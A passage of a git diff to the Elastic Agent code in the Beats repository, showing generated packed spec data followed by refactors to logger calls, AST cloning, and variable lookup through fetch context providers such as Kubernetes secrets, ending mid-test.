packer.MustUnpack("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") + unpacked := packer.MustUnpack("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") SupportedMap = make(map[string]Spec) for f, v := range unpacked { diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml index fb585dae996..006db1e9f52 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml @@ -40,6 +40,8 @@ inputs: use_output: default streams: - metricset: status + processors: + - null data_stream: dataset: docker.status - metricset: info diff --git a/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go b/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go index 2491a66d4a0..93f01d89ec8 100644 --- a/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go +++ b/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go @@ -27,8 +27,6 @@ const ( unchangedState // UNCHANGED ) -type id string - // state represent the SHOULD state of the system, contains a reference to the actual bundle of // configuration received by the upstream call and keep track of the last change executed on a program. // diff --git a/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go b/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go index e1c83c7409d..e1adea3281a 100644 --- a/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go +++ b/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go @@ -25,7 +25,7 @@ func TestStateResolverAcking(t *testing.T) { } t.Run("when we ACK the should state", func(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) r, err := NewStateResolver(log) require.NoError(t, err) @@ -38,13 +38,13 @@ func TestStateResolverAcking(t *testing.T) { ack() // Current sate is not empty lets try to resolve the same configuration. - _, _, steps, ack, err = r.Resolve(submit) + _, _, steps, _, err = r.Resolve(submit) require.NoError(t, err) require.Equal(t, 0, len(steps)) }) t.Run("when we don't ACK the should state", func(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) r, err := NewStateResolver(log) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/agent/storage/storage.go b/x-pack/elastic-agent/pkg/agent/storage/storage.go index 2ff2d7250f1..a578edb1dfd 100644 --- a/x-pack/elastic-agent/pkg/agent/storage/storage.go +++ b/x-pack/elastic-agent/pkg/agent/storage/storage.go @@ -26,10 +26,6 @@ type Store interface { Save(io.Reader) error } -type load interface { - Load() (io.ReadCloser, error) -} - // NullStore this is only use to split the work into multiples PRs. type NullStore struct{} diff --git a/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go b/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go index 6f5fbe4046a..bf9cca915f8 100644 --- a/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go +++ b/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go @@ -18,7 +18,7 @@ import ( ) func TestActionStore(t *testing.T) { - log, _ := logger.New("action_store") + log, _ := logger.New("action_store", false) withFile := func(fn func(t *testing.T, file string)) func(*testing.T) { return func(t *testing.T) { dir, err := ioutil.TempDir("", "action-store") diff --git a/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go b/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go index 1b575599dd3..d19f4b1b453 100644 --- a/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go +++ b/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go @@ -31,7 +31,7 @@ func TestStateStore(t *testing.T) { } func runTestStateStore(t *testing.T, ackToken string) { - log, _ := logger.New("state_store") + log, _ := logger.New("state_store", false) withFile := func(fn func(t *testing.T, file string)) func(*testing.T) { return func(t *testing.T) { dir, err := ioutil.TempDir("", "state-store") diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go index cfb02d1660a..13242297c9a 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go @@ -126,7 +126,11 @@ func (d *Dict) Value() interface{} { func (d *Dict) Clone() Node { nodes := make([]Node, 0, len(d.value)) for _, i := range d.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) + } return &Dict{value: nodes} } @@ -350,6 +354,9 @@ func (l *List) Value() interface{} { func (l *List) Clone() Node { nodes := make([]Node, 0, len(l.value)) for _, i := range l.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) } return &List{value: nodes} @@ -611,7 +618,7 @@ func (s *BoolVal) Find(key string) (Node, bool) { } func (s *BoolVal) String() string { - if s.value == true { + if s.value { return "true" } return "false" @@ -1077,7 +1084,7 @@ func Insert(a *AST, node Node, to Selector) error { // to create 2 different sub AST and want to merge them together again. func Combine(a, b *AST) (*AST, error) { newAST := &AST{} - if reflect.TypeOf(b.root) != reflect.TypeOf(b.root) { + if reflect.TypeOf(a.root) != reflect.TypeOf(b.root) { return nil, fmt.Errorf("incompatible node type to combine, received %T and %T", a, b) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go index 4c56b993e64..46565756d8f 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go @@ -1616,7 +1616,7 @@ func TestHash(t *testing.T) { } func mustMakeVars(mapping map[string]interface{}) *Vars { - v, err := NewVars(mapping) + v, err := NewVars(mapping, nil) if err != nil { panic(err) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/rules.go b/x-pack/elastic-agent/pkg/agent/transpiler/rules.go index 42acd53d21a..4fec7c78032 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/rules.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/rules.go @@ -953,7 +953,7 @@ func (r *TranslateWithRegexpRule) Apply(_ AgentInfo, ast *AST) error { return fmt.Errorf("cannot rename, invalid type expected 'Key' received '%T'", node) } - candidate, ok := n.value.(Node).Value().(string) + candidate, ok := n.value.Value().(string) if !ok { return fmt.Errorf("cannot filter on value expected 'string' and received %T", candidate) } @@ -1170,7 +1170,7 @@ func (r *FilterValuesRule) Apply(_ AgentInfo, ast *AST) error { } for _, v := range r.Values { - if v == n.value.(Node).Value() { + if v == n.value.Value() { newNodes = append(newNodes, item) break } @@ -1282,7 +1282,7 @@ func (r *FilterValuesWithRegexpRule) Apply(_ AgentInfo, ast *AST) error { continue } - candidate, ok := n.value.(Node).Value().(string) + candidate, ok := n.value.Value().(string) if !ok { return fmt.Errorf("cannot filter on value expected 'string' and received %T", candidate) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go b/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go index f94c87f6499..0de58a56d73 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go @@ -737,7 +737,7 @@ func TestRenderInputs(t *testing.T) { } func mustMakeVarsP(mapping map[string]interface{}, processorKey string, processors Processors) *Vars { - v, err := NewVarsWithProcessors(mapping, processorKey, processors) + v, err := NewVarsWithProcessors(mapping, processorKey, processors, nil) if err != nil { panic(err) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/vars.go b/x-pack/elastic-agent/pkg/agent/transpiler/vars.go index 698847edd16..e1818cdd160 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/vars.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/vars.go @@ -9,6 +9,10 @@ import ( "regexp" "strings" "unicode" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" + + "github.com/elastic/beats/v7/libbeat/common" ) var varsRegex = regexp.MustCompile(`\${([\p{L}\d\s\\\-_|.'"]*)}`) @@ -18,23 +22,24 @@ var ErrNoMatch = fmt.Errorf("no matching vars") // Vars is a context of variables that also contain a list of processors that go with the mapping. type Vars struct { - tree *AST - processorsKey string - processors Processors + tree *AST + processorsKey string + processors Processors + fetchContextProviders common.MapStr } // NewVars returns a new instance of vars. -func NewVars(mapping map[string]interface{}) (*Vars, error) { - return NewVarsWithProcessors(mapping, "", nil) +func NewVars(mapping map[string]interface{}, fetchContextProviders common.MapStr) (*Vars, error) { + return NewVarsWithProcessors(mapping, "", nil, fetchContextProviders) } // NewVarsWithProcessors returns a new instance of vars with attachment of processors. -func NewVarsWithProcessors(mapping map[string]interface{}, processorKey string, processors Processors) (*Vars, error) { +func NewVarsWithProcessors(mapping map[string]interface{}, processorKey string, processors Processors, fetchContextProviders common.MapStr) (*Vars, error) { tree, err := NewAST(mapping) if err != nil { return nil, err } - return &Vars{tree, processorKey, processors}, nil + return &Vars{tree, processorKey, processors, fetchContextProviders}, nil } // Replace returns a new value based on variable replacement. @@ -44,7 +49,6 @@ func (v *Vars) Replace(value string) (Node, error) { if !validBrackets(value, matchIdxs) { return nil, fmt.Errorf("starting ${ is missing ending }") } - result := "" lastIndex := 0 for _, r := range matchIdxs { @@ -60,7 +64,7 @@ func (v *Vars) Replace(value string) (Node, error) { result += value[lastIndex:r[0]] + val.Value() set = true case *varString: - node, ok := Lookup(v.tree, val.Value()) + node, ok := v.lookupNode(val.Value()) if ok { node := nodeToValue(node) if v.processorsKey != "" && varPrefixMatched(val.Value(), v.processorsKey) { @@ -90,14 +94,34 @@ func (v *Vars) Replace(value string) (Node, error) { // Lookup returns the value from the vars. func (v *Vars) Lookup(name string) (interface{}, bool) { + // lookup in the AST tree return v.tree.Lookup(name) } +// lookupNode performs a lookup on the AST, but keeps the result as a `Node`. +// +// This is different from `Lookup` which returns the actual type, not the AST type. +func (v *Vars) lookupNode(name string) (Node, bool) { + // check if the value can be retrieved from a FetchContextProvider + for providerName, provider := range v.fetchContextProviders { + if varPrefixMatched(name, providerName) { + fetchProvider := provider.(composable.FetchContextProvider) + fval, found := fetchProvider.Fetch(name) + if found { + return &StrVal{value: fval}, true + } + return &StrVal{value: ""}, false + } + } + // lookup in the AST tree + return Lookup(v.tree, name) +} + // nodeToValue ensures that the node is an actual value. func nodeToValue(node Node) Node { switch n := node.(type) { case *Key: - return n.value.(Node) + return n.value } return node } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go b/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go index 0b6566a7a94..b9a1fb2cd1d 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go @@ -9,6 +9,9 @@ import ( "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" ) func TestVars_Replace(t *testing.T) { @@ -215,7 +218,8 @@ func TestVars_ReplaceWithProcessors(t *testing.T) { }, }, "dynamic", - processers) + processers, + nil) require.NoError(t, err) res, err := vars.Replace("${testing.key1}") @@ -246,3 +250,89 @@ func TestVars_ReplaceWithProcessors(t *testing.T) { NewKey("key2", NewStrVal("value2")), }, processers), res) } + +func TestVars_ReplaceWithFetchContextProvider(t *testing.T) { + processers := Processors{ + { + "add_fields": map[string]interface{}{ + "dynamic": "added", + }, + }, + } + + mockFetchProvider, err := MockContextProviderBuilder() + require.NoError(t, err) + + fetchContextProviders := common.MapStr{ + "kubernetes_secrets": mockFetchProvider, + } + vars, err := NewVarsWithProcessors( + map[string]interface{}{ + "testing": map[string]interface{}{ + "key1": "data1", + }, + "dynamic": 